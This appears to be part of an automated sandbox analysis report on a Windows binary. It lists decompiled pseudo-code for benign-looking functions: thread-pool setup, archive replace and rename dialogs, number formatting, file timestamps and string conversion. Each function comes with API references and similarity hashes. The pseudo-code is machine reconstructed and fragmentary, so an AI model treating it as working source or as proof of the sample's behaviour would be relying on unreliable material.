          0x00200346
          0x0020034e
          0x00200350
          0x00200350
          0x00200352
          0x00200358
          0x0020035f
          0x00200373
          0x00200379
          0x0020037f
          0x0020038b
          0x00200391
          0x0020039b
          0x002003a7
          0x002003a7
          0x002003ad
          0x002003b5
          0x002003bb
          0x002003c4

          APIs
          • InitializeCriticalSection.KERNEL32(00000320,00000000,?,?,?,001FA865,00000008,00000000,?,?,001FC802,?,00000000,?,00000001,?), ref: 0020035F
          • CreateSemaphoreW.KERNEL32(00000000,00000000,00000040,00000000,?,?,?,001FA865,00000008,00000000,?,?,001FC802,?,00000000), ref: 00200369
          • CreateEventW.KERNEL32(00000000,00000001,00000001,00000000,?,?,?,001FA865,00000008,00000000,?,?,001FC802,?,00000000), ref: 00200379
          Strings
          • Thread pool initialization failed., xrefs: 00200391
          Memory Dump Source
          • Source File: 00000000.00000002.306153135.00000000001F1000.00000020.00020000.sdmp, Offset: 001F0000, based on PE: true
          • Associated: 00000000.00000002.306147089.00000000001F0000.00000002.00020000.sdmp Download File
          • Associated: 00000000.00000002.306237995.0000000000222000.00000002.00020000.sdmp Download File
          • Associated: 00000000.00000002.306258195.000000000022D000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.306270813.0000000000234000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.306276296.0000000000250000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.306289036.0000000000251000.00000002.00020000.sdmp Download File
          Similarity
          • API ID: Create$CriticalEventInitializeSectionSemaphore
          • String ID: Thread pool initialization failed.
          • API String ID: 3340455307-2182114853
          • Opcode ID: 26adb173e0ae2521f4ad751e3475b38fd3165fe6bb1377213119abeb626d0ba1
          • Instruction ID: 89b0997888d2371bc66b6339eac4ff0e0c3fa70aa1f4840e4e8d6a1f645ce728
          • Opcode Fuzzy Hash: 26adb173e0ae2521f4ad751e3475b38fd3165fe6bb1377213119abeb626d0ba1
          • Instruction Fuzzy Hash: 7211A0B1510709EFD3325F669CC8AABFBECEB65344F10482EF1DA82242D7712984CB60
          Uniqueness

          Uniqueness Score: -1.00%

          Function 0020C96E, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 46COMMON
          Download Yara Rule
          C-Code - Quality: 100%
          			E0020C96E(long _a4, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
				long _v0;
				_Unknown_base(*)()* _t16;
				int _t22;
				WCHAR* _t25;

				 *0x24ce10 = _a12;
				 *0x24ce14 = _a16;
				 *0x2375f4 = _a20;
				if( *0x2375d3 == 0) {
					if( *0x2375d2 == 0) {
						_t16 = E0020AFB9;
						_t25 = L"REPLACEFILEDLG";
						while(1) {
							_t22 = DialogBoxParamW( *0x230064, _t25,  *0x2375c8, _t16, _a4);
							if(_t22 != 4) {
								break;
							}
							if(DialogBoxParamW( *0x230060, L"RENAMEDLG",  *0x2375d8, E0020C2A7, _v0) != 0) {
								break;
							}
						}
						return _t22;
					}
					return 1;
				}
				return 0;
			}







          0x0020c979
          0x0020c982
          0x0020c98b
          0x0020c990
          0x0020c99d
          0x0020c9ae
          0x0020c9b3
          0x0020c9da
          0x0020c9ee
          0x0020c9f3
          0x00000000
          0x00000000
          0x0020c9d8
          0x00000000
          0x00000000
          0x0020c9d8
          0x00000000
          0x0020c9fa
          0x00000000
          0x0020c9a1
          0x00000000

          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.306153135.00000000001F1000.00000020.00020000.sdmp, Offset: 001F0000, based on PE: true
          • Associated: 00000000.00000002.306147089.00000000001F0000.00000002.00020000.sdmp Download File
          • Associated: 00000000.00000002.306237995.0000000000222000.00000002.00020000.sdmp Download File
          • Associated: 00000000.00000002.306258195.000000000022D000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.306270813.0000000000234000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.306276296.0000000000250000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.306289036.0000000000251000.00000002.00020000.sdmp Download File
          Similarity
          • API ID:
          • String ID: RENAMEDLG$REPLACEFILEDLG
          • API String ID: 0-56093855
          • Opcode ID: bd8366c056a0454684123eb889532071ca8ddc690402ecaf646ecac72b10dc04
          • Instruction ID: 6ae01b04361f12ea83b33931046f32b16872433dc219db4570375a66e0f0a1b5
          • Opcode Fuzzy Hash: bd8366c056a0454684123eb889532071ca8ddc690402ecaf646ecac72b10dc04
          • Instruction Fuzzy Hash: 370188F222831ABFC7159F59FD48A23BBE5E745750F100526F941A22B1D7719C30DB61
          Uniqueness

          Uniqueness Score: -1.00%

          Function 00218749, Relevance: 6.3, APIs: 4, Instructions: 305COMMON
          Download Yara Rule
          C-Code - Quality: 75%
          			E00218749(void* __edx, signed int* _a4, signed int _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, signed int _a24, signed int _a28, intOrPtr _a32, intOrPtr _a36) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				unsigned int _v20;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				char _v40;
				intOrPtr _v48;
				char _v52;
				void* __ebx;
				void* __edi;
				void* _t86;
				signed int _t92;
				signed int _t93;
				signed int _t94;
				signed int _t100;
				void* _t101;
				void* _t102;
				void* _t104;
				void* _t107;
				void* _t109;
				void* _t111;
				void* _t115;
				char* _t116;
				void* _t119;
				signed int _t121;
				signed int _t128;
				signed int* _t129;
				signed int _t136;
				signed int _t137;
				char _t138;
				signed int _t139;
				signed int _t142;
				signed int _t146;
				signed int _t151;
				char _t156;
				char _t157;
				void* _t161;
				unsigned int _t162;
				signed int _t164;
				signed int _t166;
				signed int _t170;
				void* _t171;
				signed int* _t172;
				signed int _t174;
				signed int _t181;
				signed int _t182;
				signed int _t183;
				signed int _t184;
				signed int _t185;
				signed int _t186;
				signed int _t187;

				_t171 = __edx;
				_t181 = _a24;
				if(_t181 < 0) {
					_t181 = 0;
				}
				_t184 = _a8;
				 *_t184 = 0;
				E00213356(0,  &_v52, _t171, _a36);
				_t5 = _t181 + 0xb; // 0xb
				if(_a12 > _t5) {
					_t172 = _a4;
					_t142 = _t172[1];
					_v36 =  *_t172;
					__eflags = (_t142 >> 0x00000014 & 0x000007ff) - 0x7ff;
					if((_t142 >> 0x00000014 & 0x000007ff) != 0x7ff) {
						L11:
						__eflags = _t142 & 0x80000000;
						if((_t142 & 0x80000000) != 0) {
							 *_t184 = 0x2d;
							_t184 = _t184 + 1;
							__eflags = _t184;
						}
						__eflags = _a28;
						_v16 = 0x3ff;
						_t136 = ((0 | _a28 == 0x00000000) - 0x00000001 & 0xffffffe0) + 0x27;
						__eflags = _t172[1] & 0x7ff00000;
						_v32 = _t136;
						_t86 = 0x30;
						if((_t172[1] & 0x7ff00000) != 0) {
							 *_t184 = 0x31;
							_t185 = _t184 + 1;
							__eflags = _t185;
						} else {
							 *_t184 = _t86;
							_t185 = _t184 + 1;
							_t164 =  *_t172 | _t172[1] & 0x000fffff;
							__eflags = _t164;
							if(_t164 != 0) {
								_v16 = 0x3fe;
							} else {
								_v16 = _v16 & _t164;
							}
						}
						_t146 = _t185;
						_t186 = _t185 + 1;
						_v28 = _t146;
						__eflags = _t181;
						if(_t181 != 0) {
							 *_t146 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v48 + 0x88))))));
						} else {
							 *_t146 = 0;
						}
						_t92 = _t172[1] & 0x000fffff;
						__eflags = _t92;
						_v20 = _t92;
						if(_t92 > 0) {
							L23:
							_t33 =  &_v8;
							 *_t33 = _v8 & 0x00000000;
							__eflags =  *_t33;
							_t147 = 0xf0000;
							_t93 = 0x30;
							_v12 = _t93;
							_v20 = 0xf0000;
							do {
								__eflags = _t181;
								if(_t181 <= 0) {
									break;
								}
								_t119 = E0020DAC0( *_t172 & _v8, _v12, _t172[1] & _t147 & 0x000fffff);
								_t161 = 0x30;
								_t121 = _t119 + _t161 & 0x0000ffff;
								__eflags = _t121 - 0x39;
								if(_t121 > 0x39) {
									_t121 = _t121 + _t136;
									__eflags = _t121;
								}
								_t162 = _v20;
								_t172 = _a4;
								 *_t186 = _t121;
								_t186 = _t186 + 1;
								_v8 = (_t162 << 0x00000020 | _v8) >> 4;
								_t147 = _t162 >> 4;
								_t93 = _v12 - 4;
								_t181 = _t181 - 1;
								_v20 = _t162 >> 4;
								_v12 = _t93;
								__eflags = _t93;
							} while (_t93 >= 0);
							__eflags = _t93;
							if(_t93 < 0) {
								goto L39;
							}
							_t115 = E0020DAC0( *_t172 & _v8, _v12, _t172[1] & _t147 & 0x000fffff);
							__eflags = _t115 - 8;
							if(_t115 <= 8) {
								goto L39;
							}
							_t54 = _t186 - 1; // 0x213fc1
							_t116 = _t54;
							_t138 = 0x30;
							while(1) {
								_t156 =  *_t116;
								__eflags = _t156 - 0x66;
								if(_t156 == 0x66) {
									goto L33;
								}
								__eflags = _t156 - 0x46;
								if(_t156 != 0x46) {
									_t139 = _v32;
									__eflags = _t116 - _v28;
									if(_t116 == _v28) {
										_t57 = _t116 - 1;
										 *_t57 =  *(_t116 - 1) + 1;
										__eflags =  *_t57;
									} else {
										_t157 =  *_t116;
										__eflags = _t157 - 0x39;
										if(_t157 != 0x39) {
											 *_t116 = _t157 + 1;
										} else {
											 *_t116 = _t139 + 0x3a;
										}
									}
									goto L39;
								}
								L33:
								 *_t116 = _t138;
								_t116 = _t116 - 1;
							}
						} else {
							__eflags =  *_t172;
							if( *_t172 <= 0) {
								L39:
								__eflags = _t181;
								if(_t181 > 0) {
									_push(_t181);
									_t111 = 0x30;
									_push(_t111);
									_push(_t186);
									E0020E920(_t181);
									_t186 = _t186 + _t181;
									__eflags = _t186;
								}
								_t94 = _v28;
								__eflags =  *_t94;
								if( *_t94 == 0) {
									_t186 = _t94;
								}
								__eflags = _a28;
								 *_t186 = ((_t94 & 0xffffff00 | _a28 == 0x00000000) - 0x00000001 & 0x000000e0) + 0x70;
								_t174 = _a4[1];
								_t100 = E0020DAC0( *_a4, 0x34, _t174);
								_t137 = 0;
								_t151 = (_t100 & 0x000007ff) - _v16;
								__eflags = _t151;
								asm("sbb ebx, ebx");
								if(__eflags < 0) {
									L47:
									 *(_t186 + 1) = 0x2d;
									_t187 = _t186 + 2;
									__eflags = _t187;
									_t151 =  ~_t151;
									asm("adc ebx, 0x0");
									_t137 =  ~_t137;
									goto L48;
								} else {
									if(__eflags > 0) {
										L46:
										 *(_t186 + 1) = 0x2b;
										_t187 = _t186 + 2;
										L48:
										_t182 = _t187;
										_t101 = 0x30;
										 *_t187 = _t101;
										__eflags = _t137;
										if(__eflags < 0) {
											L56:
											__eflags = _t187 - _t182;
											if(_t187 != _t182) {
												L60:
												_push(0);
												_push(0xa);
												_push(_t137);
												_push(_t151);
												_t102 = E0020DE00();
												_v32 = _t174;
												 *_t187 = _t102 + 0x30;
												_t187 = _t187 + 1;
												__eflags = _t187;
												L61:
												_t104 = 0x30;
												_t183 = 0;
												__eflags = 0;
												 *_t187 = _t151 + _t104;
												 *(_t187 + 1) = 0;
												goto L62;
											}
											__eflags = _t137;
											if(__eflags < 0) {
												goto L61;
											}
											if(__eflags > 0) {
												goto L60;
											}
											__eflags = _t151 - 0xa;
											if(_t151 < 0xa) {
												goto L61;
											}
											goto L60;
										}
										if(__eflags > 0) {
											L51:
											_push(0);
											_push(0x3e8);
											_push(_t137);
											_push(_t151);
											_t107 = E0020DE00();
											_v32 = _t174;
											 *_t187 = _t107 + 0x30;
											_t187 = _t187 + 1;
											__eflags = _t187 - _t182;
											if(_t187 != _t182) {
												L55:
												_push(0);
												_push(0x64);
												_push(_t137);
												_push(_t151);
												_t109 = E0020DE00();
												_v32 = _t174;
												 *_t187 = _t109 + 0x30;
												_t187 = _t187 + 1;
												__eflags = _t187;
												goto L56;
											}
											L52:
											__eflags = _t137;
											if(__eflags < 0) {
												goto L56;
											}
											if(__eflags > 0) {
												goto L55;
											}
											__eflags = _t151 - 0x64;
											if(_t151 < 0x64) {
												goto L56;
											}
											goto L55;
										}
										__eflags = _t151 - 0x3e8;
										if(_t151 < 0x3e8) {
											goto L52;
										}
										goto L51;
									}
									__eflags = _t151;
									if(_t151 < 0) {
										goto L47;
									}
									goto L46;
								}
							}
							goto L23;
						}
					}
					__eflags = 0;
					if(0 != 0) {
						goto L11;
					} else {
						_t183 = E00218A4C(0, _t142, 0, _t172, _t184, _a12, _a16, _a20, _t181, 0, _a32, 0);
						__eflags = _t183;
						if(_t183 == 0) {
							_t128 = E00220FD0(_t184, 0x65);
							_pop(_t166);
							__eflags = _t128;
							if(_t128 != 0) {
								__eflags = _a28;
								_t170 = ((_t166 & 0xffffff00 | _a28 == 0x00000000) - 0x00000001 & 0x000000e0) + 0x70;
								__eflags = _t170;
								 *_t128 = _t170;
								 *((char*)(_t128 + 3)) = 0;
							}
							_t183 = 0;
						} else {
							 *_t184 = 0;
						}
						goto L62;
					}
				} else {
					_t129 = E00217ECC();
					_t183 = 0x22;
					 *_t129 = _t183;
					E00217DAB();
					L62:
					if(_v40 != 0) {
						 *(_v52 + 0x350) =  *(_v52 + 0x350) & 0xfffffffd;
					}
					return _t183;
				}
			}
























































          0x00218749
          0x00218754
          0x0021875b
          0x0021875d
          0x0021875d
          0x0021875f
          0x00218768
          0x0021876a
          0x0021876f
          0x00218775
          0x0021878b
          0x00218790
          0x00218793
          0x002187a0
          0x002187a5
          0x002187f9
          0x00218801
          0x00218803
          0x00218805
          0x00218808
          0x00218808
          0x00218808
          0x0021880e
          0x00218816
          0x00218829
          0x0021882c
          0x0021882e
          0x00218831
          0x00218832
          0x00218853
          0x00218856
          0x00218856
          0x00218834
          0x00218834
          0x00218836
          0x00218841
          0x00218841
          0x00218843
          0x0021884a
          0x00218845
          0x00218845
          0x00218845
          0x00218843
          0x00218857
          0x00218859
          0x0021885a
          0x0021885d
          0x0021885f
          0x00218873
          0x00218861
          0x00218861
          0x00218861
          0x00218878
          0x00218878
          0x0021887d
          0x00218880
          0x0021888b
          0x0021888b
          0x0021888b
          0x0021888b
          0x0021888f
          0x00218896
          0x00218897
          0x0021889a
          0x0021889d
          0x0021889d
          0x0021889f
          0x00000000
          0x00000000
          0x002188b7
          0x002188be
          0x002188c2
          0x002188c5
          0x002188c8
          0x002188ca
          0x002188ca
          0x002188ca
          0x002188cc
          0x002188cf
          0x002188d2
          0x002188d4
          0x002188dc
          0x002188e2
          0x002188e5
          0x002188e8
          0x002188e9
          0x002188ec
          0x002188ef
          0x002188ef
          0x002188f4
          0x002188f7
          0x00000000
          0x00000000
          0x0021890f
          0x00218914
          0x00218918
          0x00000000
          0x00000000
          0x0021891c
          0x0021891c
          0x0021891f
          0x00218920
          0x00218920
          0x00218922
          0x00218925
          0x00000000
          0x00000000
          0x00218927
          0x0021892a
          0x00218931
          0x00218934
          0x00218937
          0x0021894d
          0x0021894d
          0x0021894d
          0x00218939
          0x00218939
          0x0021893b
          0x0021893e
          0x00218949
          0x00218940
          0x00218943
          0x00218943
          0x0021893e
          0x00000000
          0x00218937
          0x0021892c
          0x0021892c
          0x0021892e
          0x0021892e
          0x00218882
          0x00218882
          0x00218885
          0x00218950
          0x00218950
          0x00218952
          0x00218954
          0x00218957
          0x00218958
          0x00218959
          0x0021895a
          0x00218962
          0x00218962
          0x00218962
          0x00218964
          0x00218967
          0x0021896a
          0x0021896c
          0x0021896c
          0x0021896e
          0x00218980
          0x00218984
          0x00218987
          0x0021898e
          0x00218996
          0x00218996
          0x00218999
          0x0021899b
          0x002189ac
          0x002189ac
          0x002189b0
          0x002189b0
          0x002189b3
          0x002189b5
          0x002189b8
          0x00000000
          0x0021899d
          0x0021899d
          0x002189a3
          0x002189a3
          0x002189a7
          0x002189ba
          0x002189ba
          0x002189be
          0x002189bf
          0x002189c1
          0x002189c3
          0x00218a04
          0x00218a04
          0x00218a06
          0x00218a13
          0x00218a13
          0x00218a15
          0x00218a17
          0x00218a18
          0x00218a19
          0x00218a20
          0x00218a23
          0x00218a25
          0x00218a25
          0x00218a26
          0x00218a28
          0x00218a2b
          0x00218a2b
          0x00218a2d
          0x00218a2f
          0x00000000
          0x00218a2f
          0x00218a08
          0x00218a0a
          0x00000000
          0x00000000
          0x00218a0c
          0x00000000
          0x00000000
          0x00218a0e
          0x00218a11
          0x00000000
          0x00000000
          0x00000000
          0x00218a11
          0x002189ca
          0x002189d0
          0x002189d0
          0x002189d2
          0x002189d3
          0x002189d4
          0x002189d5
          0x002189dc
          0x002189df
          0x002189e1
          0x002189e2
          0x002189e4
          0x002189f1
          0x002189f1
          0x002189f3
          0x002189f5
          0x002189f6
          0x002189f7
          0x002189fe
          0x00218a01
          0x00218a03
          0x00218a03
          0x00000000
          0x00218a03
          0x002189e6
          0x002189e6
          0x002189e8
          0x00000000
          0x00000000
          0x002189ea
          0x00000000
          0x00000000
          0x002189ec
          0x002189ef
          0x00000000
          0x00000000
          0x00000000
          0x002189ef
          0x002189cc
          0x002189ce
          0x00000000
          0x00000000
          0x00000000
          0x002189ce
          0x0021899f
          0x002189a1
          0x00000000
          0x00000000
          0x00000000
          0x002189a1
          0x0021899b
          0x00000000
          0x00218885
          0x00218880
          0x002187a7
          0x002187a9
          0x00000000
          0x002187ab
          0x002187c1
          0x002187c6
          0x002187c8
          0x002187d4
          0x002187da
          0x002187db
          0x002187dd
          0x002187df
          0x002187ea
          0x002187ea
          0x002187ed
          0x002187ef
          0x002187ef
          0x002187f2
          0x002187ca
          0x002187ca
          0x002187ca
          0x00000000
          0x002187c8
          0x00218777
          0x00218777
          0x0021877e
          0x0021877f
          0x00218781
          0x00218a33
          0x00218a37
          0x00218a3c
          0x00218a3c
          0x00218a4b
          0x00218a4b

          APIs
          Memory Dump Source
          • Source File: 00000000.00000002.306153135.00000000001F1000.00000020.00020000.sdmp, Offset: 001F0000, based on PE: true
          • Associated: 00000000.00000002.306147089.00000000001F0000.00000002.00020000.sdmp Download File
          • Associated: 00000000.00000002.306237995.0000000000222000.00000002.00020000.sdmp Download File
          • Associated: 00000000.00000002.306258195.000000000022D000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.306270813.0000000000234000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.306276296.0000000000250000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.306289036.0000000000251000.00000002.00020000.sdmp Download File
          Similarity
          • API ID: __alldvrm$_strrchr
          • String ID:
          • API String ID: 1036877536-0
          • Opcode ID: f2926f290b12bce643c0ba6d96074ca090c44e05cafcf7f54dcf12bfeb7df9bf
          • Instruction ID: 5e1d44992dfb2df522e530f251caed8d93441eb12bf4a6d16bfc6db774f56f68
          • Opcode Fuzzy Hash: f2926f290b12bce643c0ba6d96074ca090c44e05cafcf7f54dcf12bfeb7df9bf
          • Instruction Fuzzy Hash: 4DA157729243869FDB21CE18C8C17FEBBE5EF65350F28416EE4949B382CA348991CB51
          Uniqueness

          Uniqueness Score: -1.00%

          Function 001F9F96, Relevance: 6.1, APIs: 4, Instructions: 127filetimeCOMMON
          Download Yara Rule
          C-Code - Quality: 94%
          			E001F9F96(void* __edx) {
				signed char _t40;
				void* _t41;
				void* _t52;
				signed char _t70;
				void* _t79;
				signed int* _t81;
				signed int* _t84;
				void* _t85;
				signed int* _t88;
				void* _t90;

				_t79 = __edx;
				E0020D940();
				_t84 =  *(_t90 + 0x1038);
				_t70 = 1;
				if(_t84 == 0) {
					L2:
					 *(_t90 + 0x11) = 0;
					L3:
					_t81 =  *(_t90 + 0x1040);
					if(_t81 == 0) {
						L5:
						 *(_t90 + 0x13) = 0;
						L6:
						_t88 =  *(_t90 + 0x1044);
						if(_t88 == 0) {
							L8:
							 *(_t90 + 0x12) = 0;
							L9:
							_t40 = E001F9E7F( *(_t90 + 0x1038));
							 *(_t90 + 0x18) = _t40;
							if(_t40 == 0xffffffff || (_t70 & _t40) == 0) {
								_t70 = 0;
							} else {
								E001FA12F( *((intOrPtr*)(_t90 + 0x103c)), 0);
							}
							_t41 = CreateFileW( *(_t90 + 0x1050), 0x40000000, 3, 0, 3, 0x2000000, 0);
							 *(_t90 + 0x14) = _t41;
							if(_t41 != 0xffffffff) {
								L16:
								if( *(_t90 + 0x11) != 0) {
									E0020082F(_t84, _t79, _t90 + 0x1c);
								}
								if( *(_t90 + 0x13) != 0) {
									E0020082F(_t81, _t79, _t90 + 0x2c);
								}
								if( *(_t90 + 0x12) != 0) {
									E0020082F(_t88, _t79, _t90 + 0x24);
								}
								_t85 =  *(_t90 + 0x14);
								asm("sbb eax, eax");
								asm("sbb eax, eax");
								asm("sbb eax, eax");
								SetFileTime(_t85,  ~( *(_t90 + 0x1b) & 0x000000ff) & _t90 + 0x00000030,  ~( *(_t90 + 0x16) & 0x000000ff) & _t90 + 0x00000024,  ~( *(_t90 + 0x11) & 0x000000ff) & _t90 + 0x0000001c);
								_t52 = CloseHandle(_t85);
								if(_t70 != 0) {
									_t52 = E001FA12F( *((intOrPtr*)(_t90 + 0x103c)),  *(_t90 + 0x18));
								}
								goto L24;
							} else {
								_t52 = E001FB32C( *(_t90 + 0x1040), _t90 + 0x38, 0x800);
								if(_t52 == 0) {
									L24:
									return _t52;
								}
								_t52 = CreateFileW(_t90 + 0x4c, 0x40000000, 3, 0, 3, 0x2000000, 0);
								 *(_t90 + 0x14) = _t52;
								if(_t52 == 0xffffffff) {
									goto L24;
								}
								goto L16;
							}
						}
						 *(_t90 + 0x12) = _t70;
						if(( *_t88 | _t88[1]) != 0) {
							goto L9;
						}
						goto L8;
					}
					 *(_t90 + 0x13) = _t70;
					if(( *_t81 | _t81[1]) != 0) {
						goto L6;
					}
					goto L5;
				}
				 *(_t90 + 0x11) = 1;
				if(( *_t84 | _t84[1]) != 0) {
					goto L3;
				}
				goto L2;
			}













          0x001f9f96
          0x001f9f9b
          0x001f9fa7
          0x001f9fae
          0x001f9fb2
          0x001f9fbf
          0x001f9fbf
          0x001f9fc3
          0x001f9fc3
          0x001f9fcc
          0x001f9fd9
          0x001f9fd9
          0x001f9fdd
          0x001f9fdd
          0x001f9fe6
          0x001f9ff4
          0x001f9ff4
          0x001f9ff8
          0x001f9fff
          0x001fa004
          0x001fa00b
          0x001fa021
          0x001fa011
          0x001fa01a
          0x001fa01a
          0x001fa03c
          0x001fa042
          0x001fa049
          0x001fa093
          0x001fa098
          0x001fa0a1
          0x001fa0a1
          0x001fa0ab
          0x001fa0b4
          0x001fa0b4
          0x001fa0be
          0x001fa0c7
          0x001fa0c7
          0x001fa0d7
          0x001fa0db
          0x001fa0eb
          0x001fa0fb
          0x001fa101
          0x001fa108
          0x001fa110
          0x001fa11d
          0x001fa11d
          0x00000000
          0x001fa04b
          0x001fa05c
          0x001fa063
          0x001fa122
          0x001fa12c
          0x001fa12c
          0x001fa080
          0x001fa086
          0x001fa08d
          0x00000000
          0x00000000
          0x00000000
          0x001fa08d
          0x001fa049
          0x001f9fee
          0x001f9ff2
          0x00000000
          0x00000000
          0x00000000
          0x001f9ff2
          0x001f9fd3
          0x001f9fd7
          0x00000000
          0x00000000
          0x00000000
          0x001f9fd7
          0x001f9fb9
          0x001f9fbd
          0x00000000
          0x00000000
          0x00000000

          APIs
          • CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000,?,?,?,00000000,?,001F7F2C,?,?,?), ref: 001FA03C
          • CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000,?,?,00000800,?,00000000,?,001F7F2C,?,?), ref: 001FA080
          • SetFileTime.KERNEL32(?,00000800,?,00000000,?,00000000,?,001F7F2C,?,?,?,?,?,?,?,?), ref: 001FA101
          • CloseHandle.KERNEL32(?,?,00000000,?,001F7F2C,?,?,?,?,?,?,?,?,?,?,?), ref: 001FA108
          Memory Dump Source
          • Source File: 00000000.00000002.306153135.00000000001F1000.00000020.00020000.sdmp, Offset: 001F0000, based on PE: true
          • Associated: 00000000.00000002.306147089.00000000001F0000.00000002.00020000.sdmp Download File
          • Associated: 00000000.00000002.306237995.0000000000222000.00000002.00020000.sdmp Download File
          • Associated: 00000000.00000002.306258195.000000000022D000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.306270813.0000000000234000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.306276296.0000000000250000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.306289036.0000000000251000.00000002.00020000.sdmp Download File
          Similarity
          • API ID: File$Create$CloseHandleTime
          • String ID:
          • API String ID: 2287278272-0
          • Opcode ID: 48aaebb5c4448320bfadf116cff5db99c76d7904a39fe7532ad2ee18bb714d71
          • Instruction ID: 452a52ef748126c70844a392e388eb027913820e086bd12b48982eb55d8601be
          • Opcode Fuzzy Hash: 48aaebb5c4448320bfadf116cff5db99c76d7904a39fe7532ad2ee18bb714d71
          • Instruction Fuzzy Hash: F541BF70148389AAE731EE24EC55BAEBBE8AF94700F040919B6D5D31D1C768DA4CDB53
          Uniqueness

          Uniqueness Score: -1.00%

          Function 0021B5EA, Relevance: 6.1, APIs: 4, Instructions: 110COMMON
          Download Yara Rule
          C-Code - Quality: 85%
          			E0021B5EA(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4, int _a8, char* _a12, int _a16, short* _a20, int _a24, intOrPtr _a28) {
				signed int _v8;
				int _v12;
				char _v16;
				intOrPtr _v24;
				char _v28;
				void* _v40;
				signed int _t34;
				signed int _t40;
				int _t46;
				int _t53;
				void* _t55;
				int _t57;
				signed int _t63;
				int _t67;
				short* _t69;
				signed int _t70;
				short* _t71;

				_t34 =  *0x22d668; // 0x4319796a
				_v8 = _t34 ^ _t70;
				E00213356(__ebx,  &_v28, __edx, _a4);
				_t57 = _a24;
				if(_t57 == 0) {
					_t6 = _v24 + 8; // 0x31e85006
					_t53 =  *_t6;
					_t57 = _t53;
					_a24 = _t53;
				}
				_t67 = 0;
				_t40 = MultiByteToWideChar(_t57, 1 + (0 | _a28 != 0x00000000) * 8, _a12, _a16, 0, 0);
				_v12 = _t40;
				if(_t40 == 0) {
					L15:
					if(_v16 != 0) {
						 *(_v28 + 0x350) =  *(_v28 + 0x350) & 0xfffffffd;
					}
					return E0020E203(_t67, _v8 ^ _t70);
				}
				_t55 = _t40 + _t40;
				asm("sbb eax, eax");
				if((_t55 + 0x00000008 & _t40) == 0) {
					_t69 = 0;
					L11:
					if(_t69 != 0) {
						E0020E920(_t67, _t69, _t67, _t55);
						_t46 = MultiByteToWideChar(_a24, 1, _a12, _a16, _t69, _v12);
						if(_t46 != 0) {
							_t67 = GetStringTypeW(_a8, _t69, _t46, _a20);
						}
					}
					L14:
					E0021980D(_t69);
					goto L15;
				}
				asm("sbb eax, eax");
				_t48 = _t40 & _t55 + 0x00000008;
				_t63 = _t55 + 8;
				if((_t40 & _t55 + 0x00000008) > 0x400) {
					asm("sbb eax, eax");
					_t69 = E00217A8A(_t63, _t48 & _t63);
					if(_t69 == 0) {
						goto L14;
					}
					 *_t69 = 0xdddd;
					L9:
					_t69 =  &(_t69[4]);
					goto L11;
				}
				asm("sbb eax, eax");
				E00220EE0();
				_t69 = _t71;
				if(_t69 == 0) {
					goto L14;
				}
				 *_t69 = 0xcccc;
				goto L9;
			}




















          0x0021b5f2
          0x0021b5f9
          0x0021b605
          0x0021b60a
          0x0021b60f
          0x0021b614
          0x0021b614
          0x0021b617
          0x0021b619
          0x0021b619
          0x0021b61e
          0x0021b637
          0x0021b63d
          0x0021b642
          0x0021b6e1
          0x0021b6e5
          0x0021b6ea
          0x0021b6ea
          0x0021b706
          0x0021b706
          0x0021b648
          0x0021b650
          0x0021b654
          0x0021b6a0
          0x0021b6a2
          0x0021b6a4
          0x0021b6a9
          0x0021b6c0
          0x0021b6c8
          0x0021b6d8
          0x0021b6d8
          0x0021b6c8
          0x0021b6da
          0x0021b6db
          0x00000000
          0x0021b6e0
          0x0021b65b
          0x0021b65d
          0x0021b65f
          0x0021b667
          0x0021b684
          0x0021b68e
          0x0021b693
          0x00000000
          0x00000000
          0x0021b695
          0x0021b69b
          0x0021b69b
          0x00000000
          0x0021b69b
          0x0021b66b
          0x0021b66f
          0x0021b674
          0x0021b678
          0x00000000
          0x00000000
          0x0021b67a
          0x00000000

          APIs
          • MultiByteToWideChar.KERNEL32(?,00000000,?,002134E6,00000000,00000000,0021451B,?,0021451B,?,00000001,002134E6,?,00000001,0021451B,0021451B), ref: 0021B637
          • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 0021B6C0
          • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 0021B6D2
          • __freea.LIBCMT ref: 0021B6DB
            • Part of subcall function 00217A8A: RtlAllocateHeap.NTDLL(00000000,?,?,?,00212FA6,?,0000015D,?,?,?,?,00214482,000000FF,00000000,?,?), ref: 00217ABC
          Memory Dump Source
          • Source File: 00000000.00000002.306153135.00000000001F1000.00000020.00020000.sdmp, Offset: 001F0000, based on PE: true
          • Associated: 00000000.00000002.306147089.00000000001F0000.00000002.00020000.sdmp Download File
          • Associated: 00000000.00000002.306237995.0000000000222000.00000002.00020000.sdmp Download File
          • Associated: 00000000.00000002.306258195.000000000022D000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.306270813.0000000000234000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.306276296.0000000000250000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.306289036.0000000000251000.00000002.00020000.sdmp Download File
          Similarity
          • API ID: ByteCharMultiWide$AllocateHeapStringType__freea
          • String ID:
          • API String ID: 2652629310-0
          • Opcode ID: bd87c9202ac56bee3cb365c306e12f40a58e19e211b0957f6f061b91d0a7961c
          • Instruction ID: 5594b324701cd3d2a048dede80c6892471019902910c228b2bb3b19bd7fcd8f2
